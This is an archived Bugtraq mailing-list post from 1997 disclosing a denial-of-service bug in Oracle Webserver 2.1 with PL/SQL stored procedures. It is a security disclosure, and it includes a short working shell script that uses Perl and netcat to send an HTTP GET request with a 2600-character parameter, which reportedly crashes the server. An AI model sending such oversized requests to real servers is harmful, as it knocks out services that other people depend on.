Home page logo
/

bugtraq logo Bugtraq mailing list archives

DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
From: jas () PDC KTH SE (Simon Josefsson)
Date: Wed, 23 Jul 1997 00:15:31 +0200


Fellow bugtraqers, I stumpled over this tonight.  It's a DoS-attack
against a Oracle Webserver 2.1 that serves PL/SQL stored procedures.

The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).

I'm sorry if this is old news (but I'd appreciate of someone told me
if there is a bugfix somewhere).

(PL/SQL is, simply put, a scripting language within the Oracle database)

---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
#       prg <host> <port> <path>
#
# example:
#       # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
---

S.



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault